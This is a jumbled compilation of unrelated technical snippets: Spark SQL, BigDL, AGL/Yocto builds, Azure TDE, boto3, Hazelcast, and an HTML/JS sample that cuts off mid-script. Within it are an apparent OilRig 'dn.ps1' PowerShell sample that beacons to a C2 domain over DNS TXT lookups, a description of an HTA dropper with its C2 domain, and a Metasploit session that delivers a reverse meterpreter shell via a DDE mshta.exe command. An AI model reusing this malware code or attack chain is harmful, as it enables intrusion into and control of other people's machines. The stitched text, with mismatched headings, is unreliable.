SQL Parquet

$ /bin/spark-sql --master local

spark-sql> CREATE TEMPORARY TABLE wikistats_parquet
           USING org.apache.spark.sql.parquet
           OPTIONS (path "/ssd/wikistats_parquet_bydate");
Time taken: 3.466 seconds

spark-sql> SELECT count(*) FROM wikistats_parquet;
227846039
Time taken: 82.185 seconds, Fetched 1 row(s)

spark-sql> SELECT lower(url) AS lurl, sum(tot_visits) AS max_visits, count(*)
           FROM wikistats_parquet
           WHERE lower(url) NOT LIKE '%special%'
             AND lower(url) NOT LIKE '%page%'
             AND lower(url) NOT LIKE '%test%'
             AND lower(url) NOT LIKE '%wiki%'
           GROUP BY lower(url)
           ORDER BY max_visits DESC
           LIMIT 10;
heath_ledger   4247335   42
cloverfield    3846400   42
barack_obama   2238402   53
1925_in_baseball#Negro_League_baseball_final_standing   1791341   11
the_dark_knight_(film)   1417183   36
martin_luther_king,_jr.   1394934   46
deaths_in_2008   1372510   38
united_states   1357251   55
scientology   1349650   440
portal:current_events   1361305   44
Time taken: 1339.014 seconds, Fetched 10 row(s)
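For comparison, here is a minimal PySpark sketch of the same aggregation through the DataFrame API. It assumes the parquet path and the url / tot_visits columns used in the spark-sql session above.

# PySpark sketch of the top-10 query above (assumes the same parquet layout)
from pyspark.sql import SparkSession
from pyspark.sql import functions as F

spark = SparkSession.builder.master("local").getOrCreate()

stats = spark.read.parquet("/ssd/wikistats_parquet_bydate")
top10 = (stats
         .withColumn("lurl", F.lower(F.col("url")))
         .filter(~F.col("lurl").like("%special%"))
         .filter(~F.col("lurl").like("%page%"))
         .filter(~F.col("lurl").like("%test%"))
         .filter(~F.col("lurl").like("%wiki%"))
         .groupBy("lurl")
         .agg(F.sum("tot_visits").alias("max_visits"), F.count("*").alias("cnt"))
         .orderBy(F.desc("max_visits"))
         .limit(10))
top10.show(truncate=False)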

OilRig's dn.ps1 File

$global:dFold = $env:userprofile + "\AppData\Local\Microsoft\Media\dn"
$global:uFold = $env:userprofile + "\AppData\Local\Microsoft\Media\up"
$id = "DNSTRJASONBORN-PCR1330528302"
$maxhostlength = 50;
$global:hostname = "Shalength.tk"
if (@(Get-WmiObject Win32_Process -Filter "Name = 'powershell.exe' AND CommandLine LIKE '%dn.ps1%'").Count -gt 1) { exit } else { "Only one instance is running" }
if (-not (Test-Path $global:uFold)) { mkdir $global:uFold }
if (-not (Test-Path $global:dFold)) { mkdir $global:dFold }

# ============ download regular files ============
# ============ check existence of regular file ============
$global:regFileName = ""
$continue = [int]0
while ($continue -eq 0) {
    $regExistence = [int]-1
    while ($regExistence -eq -1) {
        $sendData = "rne_" + ([string]$id).Replace("_", "-") + "_" + ([string](Get-Random)) + "." + ([string]$global:hostname)
        $serverRet = ([string](NSLookup.exe -q=TXT $sendData | Select-String -Pattern '"*"')).Replace(",`"", "").Trim();
        if ($serverRet.StartsWith("OK"))   # OK<filename>
        {
            $regExistence = 1
            $global:regFileName = $serverRet.Substring(2, $serverRet.Length - 2).Replace("_-_", ",").Trim()
        }
        elseif ($serverRet -eq "NO") {
            $regExistence = [int]0;
            $continue = [int]1;
        }
    }

    if ($regExistence -eq 1 -and $global:regFileName -ne "") {
        # ============ download regular file ============
        $serverRet = ""
        $regularFilePath = ($global:dFold) + "\" + ($global:regFileName)
        if (-not (Test-Path $regularFilePath))
        {
            # create an empty placeholder file
            Out-Null > $regularFilePath
        }
    }
}

 

Spark, HDFS, Text Files and Others: Abstract

/**
 * Returns an RDD with scored bigrams based on the frequency of consecutive commands.
 * @param commands an RDD containing strings of commands
 * @return an RDD of ScoredBigram, scored by frequency
 */
def rawFrequency(commands: RDD[String]): RDD[ScoredBigram] = {
  val parser = new CLIParseDriver
  val commandsAsBigrams = commands.map(line =>
    parser.getCommandsToken(parser.getSyntaxTree(line.toString)))
  val bigramsWithoutEnds = commandsAsBigrams.flatMap(bigrams =>
    bigrams.filter((bigram: Bigram) => bigram._2 != "END"))
  val bigramCounts = bigramsWithoutEnds
    .map((bigram: Bigram) => (bigram, 1))
    .reduceByKey((x: Int, y: Int) => x + y)
  val totalNumBigrams = bigramsWithoutEnds.count()
  bigramCounts
    .map((bigramCount: BigramCount) => (1.0 * bigramCount._2 / totalNumBigrams, bigramCount._1))
    .sortByKey(ascending = false)
}

 

 

OilRig's HTA File

The HTA file creates a folder named %PUBLIC%\{5468973-4973-50726F6A656374-414C4D412E-2}, to which it writes three files with the following names:

SystemSyncs.exe, m6.e, and cfg files:

The C2 domain is prosalar[.]com. The SystemSyncs.exe file (SHA256: 2fc7810a316863a5a5076bf3078ac6fad246bc8773a5fb835e0993609e5bb62e)

The "m6.e" file (SHA256: 2d6f06d8ee0da16d2335f26eb18cd1f620c4db3e880efa6a5999eff53b12415c)

The VBScript in the HTA file executes the SystemSyncs.exe command and programmatically creates a scheduled task using the Schedule.Service object. The scheduled task, as seen in Figure 1, shows that the payload will be executed every two minutes with the command line argument "Lock".

The payload reads the ProductId from the registry, specifically from SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductId.
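For illustration only, a small Python sketch (standard-library winreg, Windows host assumed) of reading that registry value; the payload itself does this from its own code, not Python.

# Illustrative: read the Windows ProductId value the payload collects
import winreg

key = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                     r"SOFTWARE\Microsoft\Windows NT\CurrentVersion")
product_id, _ = winreg.QueryValueEx(key, "ProductId")
winreg.CloseKey(key)
print(product_id)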

The C2 server receives the collected data.

Hardcoded ID string: 4995ID3d7f11b4-0-2D-2D.prosalar.com

A random 4-digit identifier is combined with the unique C2 domain.

 

Metasploit:

Configured to host the remote shell handler on the server 192.168.56.103.

msf > use /exploits/windows/smb/PS_shell

[-] Failed to load module: /exploits/windows/smb/PS_shell
msf > use exploit/windows/smb/PS_shell
msf exploit(PS_shell) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(PS_shell) > set lhost 192.168.56.103
lhost => 192.168.56.103
msf exploit(PS_shell) > set uripath abc
uripath => abc
msf exploit(PS_shell) > exploit
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.56.103:4444
[*] Using URL: http://0.0.0.0:8080/abc
[*] Local IP: http://127.0.0.1:8080/abc
[*] Server started.
[*] Place the following DDE in MS document: mshta.exe "http://192.168.56.103:8080/abc"

msf exploit(PS_shell) >
[*] 192.168.56.101  PS_shell - Delivering payload
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.103:4444 -> 192.168.56.101:55490) at 2017-25 15:37 -0500

Python Machine Learning

# Sebastian Raschka, 2015

# convenience function to add internal links to an IPython notebook TOC
# usage: python ipynb_toc_links.py blank_tocs/ch01.toc

import sys

ipynb = sys.argv[1]

with open(ipynb, 'r') as f:
    for line in f:
        out_str = ' ' * (len(line) - len(line.lstrip()))
        line = line.strip()
        out_str += '- [%s' % line
        out_str += '](#%s)' % line.replace(' ', '-')
        print(out_str)

 

api_client.rb file - DATASETS :

def get_account_balance
  session_url = '/session'
  Rails.cache.fetch(session_url + '_balance', expires_in: 2.minutes) do
    response = self.class.get(session_url, headers)
    response.headers["nexosis-account-balance"]
  end
end

Sending the data:

csv.each do |row|
  rowCount += 1
  content.concat(row.map { |str| "\"#{str}\"" }.join(',')).concat("\r\n")
  if (rowCount % 5000 == 0 || rowCount == csv.length)
    response = self.class.put(dataset_url, { :headers => headers, :body => content })
    content = ""
  end
end
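For readers not working in Ruby, here is a rough Python sketch of the same batching idea: buffer quoted CSV rows and PUT them to the dataset endpoint every 5000 rows and once at the end. The dataset_url and headers arguments are stand-ins for the Ruby variables above, and the requests library is an assumption, not part of the original sample.

# Python sketch of the 5000-row batching PUT (requests is an assumed dependency)
import csv
import requests

def send_csv(path, dataset_url, headers, batch_size=5000):
    # Read all rows up front so the total row count is known, as the Ruby code does
    with open(path, newline="") as f:
        rows = list(csv.reader(f))
    buffer = []
    for row_count, row in enumerate(rows, start=1):
        buffer.append(",".join('"%s"' % field for field in row))
        if row_count % batch_size == 0 or row_count == len(rows):
            body = "\r\n".join(buffer) + "\r\n"
            # PUT the accumulated batch to the dataset endpoint
            requests.put(dataset_url, headers=headers, data=body)
            buffer = []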

 

 

 

API Master Model

Linear -> Sigmoid -> Softmax

Scala:

val linear = Linear(...).inputs()
val sigmoid = Sigmoid().inputs(linear)

val softmax = Softmax().inputs(sigmoid)

val model = Graph(Seq(linear), Seq(softmax))

Python:

linear = Linear(...)()
sigmoid = Sigmoid()(linear)
softmax = Softmax()(sigmoid)
model = Model([linear], [softmax])

Define a model:

Linear -> ReLU -+-> Linear -> ReLU
                +-> Linear -> ReLU

Scala:

val linear1 = Linear(...).inputs()
val relu1 = ReLU().inputs(linear1)
val linear2 = Linear(...).inputs(relu1)
val relu2 = ReLU().inputs(linear2)
val linear3 = Linear(...).inputs(relu1)
val relu3 = ReLU().inputs(linear3)
val model = Graph(Seq(linear1), Seq(relu2, relu3))

Python:

linear1 = Linear(...)()
relu1 = ReLU()(linear1)
linear2 = Linear(...)(relu1)
relu2 = ReLU()(linear2)
linear3 = Linear(...)(relu1)
relu3 = ReLU()(linear3)
add = CAddTable()([relu2, relu3])
model = Model([linear1], [add])

 

Command Abbreviations:

add 1 alter 3 backup 2 bottom 1 cappend 2 change 1 cchange cinsert 2 clast 3 compress 4 copy 2 count 3 coverlay 3 cursor 3 delete 3 cdelete 2 down 1 duplicate 3 xedit 1 expand 3 extract 3 find 1 nfind 2 nfindup 6 nfup 3 cfind 2 findup 3 fup 2 forward 2 get help 1 hextype 4 input 1 preserve input 3 join 1 split 2 splitjoin load locate 1 clocate 2 lowercase 3 uppercase 3 lprefix 2 macro merge 2 modify 3 move 2 msg next 1 overlay 1 parse preserve 4 purge 3 put putd query 1 quit read recover 3 refresh renum 3 repeat 3 replace 1 creplace 2 reset 3 restore 4 rgtleft right 2 left 2 save set shift 2 si sort sos stack 3 status 4 top transfer 3 type 1 up 1

Intel BigDL

Export a TensorFlow checkpoint into a BigDL-loadable model definition (model.pb) and binary weights file (model.bin):

GRAPH_META_FILE=/tmp/tensorflow/model.ckpt.meta
CKPT_FILE_PREFIX=/tmp/tensorflow/model.ckpt
SAVE_PATH=/tmp/model/
python export_tfcheckpoint.py $GRAPH_META_FILE $CKPT_FILE_PREFIX $SAVE_PATH

import tensorflow as tf

# This is the model definition.
xs = tf.placeholder(tf.float32, [None, 1])
W1 = tf.Variable(tf.zeros([1, 10]) + 0.2)
b1 = tf.Variable(tf.zeros([10]) + 0.1)
Wx_plus_b1 = tf.nn.bias_add(tf.matmul(xs, W1), b1)
output = tf.nn.tanh(Wx_plus_b1, name="outputs")

# Add the following lines right after the model definition.
from bigdl.util.tf_utils import dump_model
dump_model_path = "/tmp/model"
# This call creates a session, initializes all the variables, and saves the
# model definition and variables to dump_model_path in a BigDL-readable format.
dump_model(path=dump_model_path)

Scala

import com.intel.analytics.bigdl.utils._
import com.intel.analytics.bigdl.nn.Module
import java.nio.ByteOrder

val modelPath = "/tmp/model/model.pb"
val binPath = "/tmp/model/model.bin"
val inputs = Seq("Placeholder")
val outputs = Seq("outputs")
val model = Module.loadTF(modelPath, inputs, outputs, ByteOrder.LITTLE_ENDIAN, Some(binPath))

Python:

from bigdl.nn.layer import *

model_def = "/tmp/model/model.pb"
model_variable = "/tmp/model/model.bin"
inputs = ["Placeholder"]
outputs = ["outputs"]
model = Model.load_tensorflow(model_def, inputs, outputs,
                              byte_order="little_endian",
                              bigdl_type="float",
                              bin_file=model_variable)

 

 

Ubuntu 17.04

dockerfiles/ubuntu/ubuntu-17.04/ubuntu-17.04-base/Dockerfile

# ubuntu-17.04-base
#
# Copyright (C) 2015-2018 Intel Corporation
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

FROM ubuntu:17.04

RUN apt-get update && \
    apt-get install -y \
        gawk \
        wget \
        git-core \
        diffstat \
        unzip \
        sysstat \
        texinfo \
        gcc-multilib \
        build-essential \
        chrpath \
        socat \
        python \
        python3 \
        xz-utils \
        locales \
        cpio \
        screen \
        tmux \
        sudo \
        iputils-ping \
        iproute2 \
        fluxbox \
        tightvncserver && \
    cp -af /etc/skel/ /etc/vncskel/ && \
    echo "export DISPLAY=:1" >> /etc/vncskel/.bashrc && \
    mkdir /etc/vncskel/.vnc && \
    echo "" | vncpasswd -f > /etc/vncskel/.vnc/passwd && \
    chmod 0600 /etc/vncskel/.vnc/passwd && \
    useradd -m yoctouser && \
    /usr/sbin/locale-gen en_US.UTF-8

COPY build-install-dumb-init.sh /
RUN bash /build-install-dumb-init.sh && \
    rm /build-install-dumb-init.sh && \
    apt-get clean

USER yoctouser
WORKDIR /home/yoctouser
CMD /bin/bash

Inversify -Binding

// Place settings in this file to overwrite default and user settings.

{
  "files.exclude": {
    "**/.git": true,
    "**/.DS_Store": true,
    "src/**/*.js": true,
    "test/**/*.js": true,
    "**/es": true,
    "**/lib": true,
    "**/amd": true,
    "**/dts": true,
    "**/coverage": true,
    "**/dist": true,
    "**/docs": true,
    "type_definitions/**/*.js": true
  },
  "vsicons.presets.angular": false
}

 Quake IRC ;

Static # agl

#agl (no topic set) [04:16] == Messtone_ [ac3a69c6@gateway/web/freenode/ip.172.58.105.98] has joined #agl

AGL Run Complete Environment:

$ source meta-agl/scripts/aglsetup.sh -h agl-demo

$ source meta-agl/scripts/aglsetup.sh -m qemux86-64 agl-demo agl-netboot agl-appfw-smack
$ bitbake agl-demo-platform

Command :

Building the kernel

$ bitbake virtual/kernel

Find the kernel source:

build/tmp/work/qemux86_64-poky-linux/linux-yocto/3.14.19*/linux/
build/tmp/work/porter-poky-linux-gnueabi/linux-renesas/3.10*/git/

 

 DATA Analysis List

set(LLVM_LINK_COMPONENTS
  Support
  )

add_clang_library(clangAnalysis
  AnalysisDeclContext.cpp
  BodyFarm.cpp
  CFG.cpp
  CFGReachabilityAnalysis.cpp
  CFGStmtMap.cpp
  CallGraph.cpp
  CocoaConventions.cpp
  Consumed.cpp
  CodeInjector.cpp
  Dominators.cpp
  ExprScopeAnalysis.cpp
  FormatString.cpp
  LiveVariables.cpp
  ObjCNoReturn.cpp
  PostOrderCFGView.cpp
  PrintfFormatString.cpp
  ProgramPoint.cpp
  PseudoConstantAnalysis.cpp
  ReachableCode.cpp
  ReachableConditions.cpp
  RosPatterns.cpp
  ScanfFormatString.cpp
  ThreadSafety.cpp
  ThreadSafetyCommon.cpp
  ThreadSafetyLogical.cpp
  ThreadSafetyTIL.cpp
  UninitializedValues.cpp

  LINK_LIBS
  clangAST
  clangBasic
  clangLex
  )

 

 

 

 

 

Encryption Protectors - Create Or Update

PUT

https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/encryptionProtector/{encryptionProtectorName}?api-version=2015-05-01-preview

GET

https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql/servers/{serverName}/databases/{databaseName}/transparentDataEncryption/{transparentDataEncryptionName}?api-version=2014-04-01
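As a rough illustration, here is a minimal Python sketch of the GET call above using the requests library. The subscription, resource group, server, and database names, the TDE configuration name, and the bearer token are all placeholders, not values from this document.

# Sketch: query a database's transparent data encryption state via the ARM REST API
import requests

url = ("https://management.azure.com/subscriptions/{subscriptionId}"
       "/resourceGroups/{resourceGroupName}/providers/Microsoft.Sql"
       "/servers/{serverName}/databases/{databaseName}"
       "/transparentDataEncryption/{tdeName}").format(
           subscriptionId="00000000-0000-0000-0000-000000000000",
           resourceGroupName="my-resource-group",
           serverName="my-sql-server",
           databaseName="my-database",
           tdeName="current")  # placeholder configuration name

resp = requests.get(url,
                    params={"api-version": "2014-04-01"},
                    headers={"Authorization": "Bearer <access-token>"})
print(resp.status_code, resp.json())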

Create a server certificate (MyServerCert) and enable TDE:

USE master;
GO
CREATE CERTIFICATE MyServerCert WITH SUBJECT = 'My DEK Certificate';
GO
USE AdventureWorks2012;
GO
CREATE DATABASE ENCRYPTION KEY
WITH ALGORITHM = AES_128
ENCRYPTION BY SERVER CERTIFICATE MyServerCert;
GO
ALTER DATABASE AdventureWorks2012
SET ENCRYPTION ON;
GO

 

SQL

SELECT [name], [is_encrypted]
FROM sys.databases;

 

SQL Data Warehouse and Parallel Data Warehouse

sys.dm_pdw_nodes_database_encryption_keys

SELECT D.database_id AS DBIDinMaster,
       D.name AS UserDatabaseName,
       PD.pdw_node_id AS NodeID,
       DM.physical_name AS PhysDBName,
       keys.encryption_state
FROM sys.dm_pdw_nodes_database_encryption_keys AS keys
JOIN sys.pdw_nodes_pdw_physical_databases AS PD
    ON keys.database_id = PD.database_id AND keys.pdw_node_id = PD.pdw_node_id
JOIN sys.pdw_database_mappings AS DM
    ON DM.physical_name = PD.physical_name
JOIN sys.databases AS D
    ON D.database_id = DM.database_id
ORDER BY D.database_id, PD.pdw_node_id;

 

 

 

 

 

JSON-Based Configuration

[openxc]

{
  "name": "Messtone",
  "extra_sources": [],
  "initializers": [],
  "loopers": [],
  "buses": {},
  "commands": [],
  "0x309": {
    "bus": "hs",
    "signals": {
      "PT_FuelLevel": {
        "generic_name": "fuel.level",
        "bit_position": 8,
        "bit_size": 8,
        "factor": 0.392157,
        "offset": 0
      },
      "PT_EngineSpeed": {
        "generic_name": "engine.speed",
        "bit_position": 16,
        "factor": 0.25,
        "offset": 0
      },
      "PT_FuelLevelLow": {
        "generic_name": "fuel.level.low",
        "bit_position": 55,
        "bit_size": 1,
        "factor": 1,
        "offset": 0,
        "decoder": "booleanDecoder"
      }
    }
  }
}

Notation: OBD-II Standard PIDs

engine.load engine.coolant.temperature fuel.pressure intake.manifold.pressure engine.speed vehicle.speed intake.temperature mass.airflow throttle.position running.time EGR.error fuel.level barometric.pressure commanded.throttle.position ethanol.fuel.percentage accelerator.pedal.position hybrid.battery-pack.remaining.life engine.oil.temperature engine.torque

Struct afb_verb_v2

/*
 * Description of one verb of the API provided by the binding.
 * This structure is valid for bindings of type version 2.
 */
struct afb_verb_v2
{
        const char *verb;                       /* name of the verb */
        void (*callback)(struct afb_req req);   /* callback function implementing the verb */
        const struct afb_auth *auth;            /* required authorization */
        const char *info;                       /* some info about the verb, can be NULL */
        uint32_t session;                       /* authorization and session requirements of the verb */
};

 

 

Diffstat

diff --git a/Dockerfile b/Dockerfile
index 852dc7e..9aa582 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -1,4 +1,4 @@
-FROM debian:8
+FROM debian:9

diff --git a/INSTALL/common.d/10_base b/INSTALL/common.d/10_base
index a1e32c2..fa9cb51 100644
--- a/INSTALL/common.d/10_base
+++ b/INSTALL/common.d/10_base
@@ -12,7 +12,7 @@ diverter=$(dpkg-divert --list package/bin)

}

 # add backports and testing repositories
-echo "deb http://http.debian.net/debian jessie-backports main contrib" >> /etc/apt/sources.list
+echo "deb http://http.debian.net/debian stable-backports main contrib" >> /etc/apt/sources.list

 # setup network retries for apt
 echo "Acquire::Retries 5;" > /etc/apt/apt.conf.d/99netretries

AWS SDK Python

git clone https://github.com/awslabs/aws-python-sample.git

pip install boto

Configuration

[default]
aws_access_key_id = YOUR_ACCESS_KEY_ID
aws_secret_access_key = YOUR_SECRET_ACCESS_KEY

Run Sample

cd aws-python-sample
python s3_sample.py

Boto3:

import boto3

# Let's use Amazon S3
s3 = boto3.resource('s3')

Print out all bucket names:

# Print bucket names
for bucket in s3.buckets.all():
    print(bucket.name)

Binary Data:

# Upload a new file
data = open('test.jpg', 'rb')
s3.Bucket('messtone-bucket').put_object(Key='test.jpg', Body=data)

Resource and Collections:

See the Boto3 documentation ("A Sample Tutorial") for more on resources and collections.
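A small sketch of what the resource/collection API looks like in practice; the bucket name and prefix are placeholders.

# Iterate a bucket's objects through the boto3 resource collection API
import boto3

s3 = boto3.resource('s3')
bucket = s3.Bucket('messtone-bucket')

# All objects in the bucket
for obj in bucket.objects.all():
    print(obj.key, obj.size)

# Only the objects under a given prefix
for obj in bucket.objects.filter(Prefix='photos/'):
    print(obj.key)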

 


 

 

Rockyou

bower install aws-sdk-js

{
  "name": "rockyou",
  "version": "1.1.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "lint": "standard --fix",
    "test": "mocha test/*.js",
    "posttest": "npm run lint"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "devDependencies": {
    "chai": "^4.0.0",
    "mocha": "^3.4.1",
    "standard": "^10.0.2"
  }
}

 

Building target AGL images with the Yocto Project.

Ubuntu/Debian distribution:

sudo apt-get install gawk wget git-core diffstat unzip texinfo gcc-multilib \
  build-essential chrpath socat libsdl1.2-dev xterm cpio curl

Fedora distribution command:

sudo yum install gawk make wget tar bzip2 gzip python unzip perl patch \
  diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \
  ccache perl-Data-Dumper perl-Text-ParseWords perl-Thread-Queue socat \
  SDL-devel xterm curl

openSUSE distribution command:

sudo zypper install python gcc gcc-c++ git chrpath make wget python-xml \
  diffstat texinfo python-curses patch socat libSDL-devel xterm curl \
  python3 python3-curses glibc-locale

CentOS distribution:

sudo yum install gawk make wget tar bzip2 gzip python unzip perl \
  diffutils diffstat git cpp gcc gcc-c++ glibc-devel texinfo chrpath \

Prepare Repo:

$ mkdir ~/bin
$ export PATH=~/bin:$PATH
$ curl https://storage.googleapis.com/git-repo-downloads/repo > ~/bin/repo
$ chmod a+x ~/bin/repo

Master:

$ repo init -u https://gerrit.automotivelinux.org/gerrit/AGL-repo
$ repo sync

Stable release:

$ repo init -b dab -u https://gerrit.automotivelinux.org/gerrit/AGL-repo
$ repo sync

Test Stable release:

$ repo init -b chinook -u https://gerrit.automotivelinux.org/gerrit/AGL/AGL-repo
$ repo sync

Latest release:

$ cd $AGL_TOP
$ repo init -b dab -m dab_4.0.2.xml -u https://gerrit.automotivelinux.org/gerrit/AGL-repo
$ repo sync

 

Hazelcast Vertex:

Vertex min = dag.newVertex("min", accumulate(
        () -> new MyObject(Type.SOME_ENUM, Double.MAX_VALUE, 0L),
        (cMin, x) -> ((MyObject) x).getValue() < cMin.getValue() ? (MyObject) x : cMin,
        (cMin) -> cMin));

Accumulator function:

Vertex min = dag.newVertex("min", accumulate(
        () -> new MyObject(Double.MAX_VALUE),
        (MyObject acc, MyObject x) -> x.getValue() < acc.getValue() ? x : acc));

With static type parameters:

Vertex min = dag.newVertex("min", Processors.<MyObject, MyObject>accumulate(
        () -> new MyObject(Type.SOME_ENUM, Double.MAX_VALUE, 0L),
        (cMin, x) -> x.getValue() < cMin.getValue() ? x : cMin));

 

 

 

Hazelcast

Distribution: hazelcast-jet-<version>.jar

import com.hazelcast.jet.Jet;
import com.hazelcast.jet.JetInstance;
import com.hazelcast.jet.Pipeline;
import com.hazelcast.jet.Sinks;
import com.hazelcast.jet.Sources;

import java.util.List;
import java.util.Map;

import static com.hazelcast.jet.Traversers.traverseArray;
import static com.hazelcast.jet.aggregate.AggregateOperations.counting;
import static com.hazelcast.jet.function.DistributedFunctions.wholeItem;

public class WordCount {
    public static void main(String[] args) throws Exception {
        // Create the specification of the computation pipeline. Note that
        // it is a pure POJO: no instance of Jet is needed to create it.
        Pipeline p = Pipeline.create();
        p.drawFrom(Sources.<String>list("text"))
         .flatMap(line -> traverseArray(line.toLowerCase().split("\\W+")))
         .filter(word -> !word.isEmpty())
         .groupBy(wholeItem(), counting())
         .drainTo(Sinks.map("counts"));

        // Start Jet and populate the input list
        JetInstance jet = Jet.newJetInstance();
        try {
            List<String> text = jet.getList("text");
            text.add("hello world hello hello world");
            text.add("world world hello world");

            // Perform the computation
            jet.newJob(p).join();

            // Check the results
            Map<String, Long> counts = jet.getMap("counts");
            System.out.println("Count of hello: " + counts.get("hello"));
            System.out.println("Count of world: " + counts.get("world"));
        } finally {
            Jet.shutdownAll();
        }
    }
}

 

Algorithm

The automatic replication algorithm in SGIGrid is based on statistical data extracted by the log analyzer from the system logs. The data contains information about the following events: file creation/removal, replica creation/removal, and write access. For each file which fulfills the initial constraints (file size, number of replicas, etc.), a list of pairs (ui, wi) is created, where ui is the IP address of a requesting node and wi is the weight associated with the file usage from this IP address, defined as:

w_i = Σ_{t_a ∈ L_r(u_i)} f(t_a)

where Lr(ui) is the set of read events performed from the address ui, ta is the timestamp of a read event, and f(ta) is a function which controls the influence of the timestamp on the value of the weight. For each ui for which wi > Wmin, an optimal data container Ki is selected from the set of containers K; Wmin is a threshold value. The selection algorithm is the same as in Section 5.1, the only difference being that the estimated access time is not taken into consideration. As a result, triples (ui, wi, Ki) are produced, and the triples are then grouped into Uk.
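A short Python sketch of the weight computation described above. The exponential decay used for f(ta) is only one possible choice, since the algorithm leaves f open, and the (ip, timestamp) event format is an assumption.

# Sketch: w_i is the sum of f(t_a) over the read events from address u_i
import math
import time
from collections import defaultdict

def compute_weights(read_events, half_life=7 * 24 * 3600):
    """read_events: iterable of (ip_address, timestamp) pairs."""
    now = time.time()
    decay = math.log(2) / half_life

    def f(ta):
        # Illustrative choice of f: recent reads weigh more than old ones
        return math.exp(-decay * (now - ta))

    weights = defaultdict(float)
    for ip, ta in read_events:
        weights[ip] += f(ta)
    return weights  # {u_i: w_i}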

 

Markup Language

(Hypertext Markup Language)

<!DOCTYPE html>
<html>
<!-- created 2010-01-01 -->
<head>
<title>Sample</title>
</head>
<body>
<p>Voluptatem accusantium totam rem aperiam.</p>

</body>

</html>

 

Source List

<?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 14.0.0, SVG Export Plug-In. SVG Version: 6.00 Build 434363) -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" id="Messtone_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     x="0px" y="0px" width="266px" height="310px" viewBox="0 0 266 310" enable-background="new 0 0 266 310" xml:space="preserve">
<desc>Sample image of HTML code</desc>
<g id="background_box">
  <g>
    <linearGradient id="page_3_" gradientUnits="userSpaceOnUse" x1="236" y1="275" x2="35.0012" y2="74.0012" gradientTransform="matrix(1 0 0 -1 2 312)">
      <stop offset="0" style="stop-color:#F3F3F3"/>
    </linearGradient>
    <path id="page_2_" fill="url(#page_3_)" fill-opacity="0.2" d="M11,11v288h254V81l-64-70H11z"/>
  </g>
  <g>
    <linearGradient id="page_4_" gradientUnits="userSpaceOnUse" x1="-10.4058" y1="289.8027" x2="233.5942" y2="7.8027" gradientTransform="matrix(1 0 0 -1 7 317)">
      <stop offset="0.55" style="stop-color:#FFFFFF"/>
      <stop offset="1" style="stop-color:#000000"/>
    </linearGradient>
    <path id="page_1_" fill="url(#page_4_)" fill-opacity="0.2" d="M7,7v288h254V77L197,7H7z"/>
  </g>
  <g>
    <linearGradient id="page_5_" gradientUnits="userSpaceOnUse" x1="236" y1="275" x2="35.0012" y2="74.0012" gradientTransform="matrix(1 0 0 -1 2 312)">
      <stop offset="0" style="stop-color:#DADADA"/>
      <stop offset="0.35" style="stop-color:#F3F3F3"/>
    </linearGradient>
    <path id="page_2_" fill="url(#page_5_)" stroke="#222222" stroke-opacity="0.5" d="M2,2v288h254V72L192,2H2z"/>
  <g>

 

S3 ObjectKeys

title.basics.tsv.gz - contains the following information for titles:

tconst (string) - alphanumeric unique identifier of the title
titleType (string) - the type/format of the title (e.g. movie, short, tvseries, tvepisode, video, etc.)
primaryTitle (string) - the more popular title / the title used by the filmmakers on promotional materials at the point of release
originalTitle (string) - original title, in the original language
isAdult (boolean) - 0: non-adult title; 1: adult title
startYear (YYYY) - represents the release year of a title. In the case of TV series, it is the series start year
endYear (YYYY) - TV series end year. '\N' for all other title types
runtimeMinutes - primary runtime of the title, in minutes
genres (string array) - includes up to three genres associated with the title
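A minimal pandas sketch for loading the file with the columns listed above; the dtype choices are assumptions, and IMDb's '\N' marker is mapped to missing values.

# Load title.basics.tsv.gz and pick out non-adult movies
import pandas as pd

titles = pd.read_csv(
    "title.basics.tsv.gz",
    sep="\t",
    compression="gzip",
    na_values="\\N",
    dtype={"isAdult": "object", "startYear": "object", "endYear": "object"},
    low_memory=False,
)

movies = titles[(titles["titleType"] == "movie") & (titles["isAdult"] == "0")]
print(movies[["tconst", "primaryTitle", "startYear", "genres"]].head())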

Console Role

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Action": ["s3:PutObject", "s3:PutObjectAcl"],
      "Resource": ["arn:aws:s3:::YOUR_BUCKET_NAME/facebook-${graph.facebook.com:id}/*"],
      "Effect": "Allow",
      "Condition": {
        "StringEquals": {
          "s3:prefix": "facebook-${graph.facebook.com:id}"
        }
      }
    }
  ]
}

 

IAM Console

Summary Tab.

<!DOCTYPE html>
<html>
  <head>
    <title>AWS SDK for JavaScript - Sample Application</title>
    <script src="https://sdk.amazonaws.com/js/aws-sdk-2.1.12.min.js"></script>
  </head>
  <body>
    <input type="file" id="file-chooser" />
    <button id="upload-button" style="display:none">Upload to S3</button>
    <div id="results"></div>
    <div id="fb-root"></div>
    <script type="text/javascript">
      var appId = 'YOUR_APP_ID';
      var roleArn = 'YOUR_ROLE_ARN';
      var bucketName = 'YOUR_BUCKET_NAME';
      AWS.config.region = 'YOUR_BUCKET_REGION';
      var fbUserId;
      var bucket = new AWS.S3({
        params: { Bucket: bucketName }
      });
      var fileChooser = document.getElementById('file-chooser');
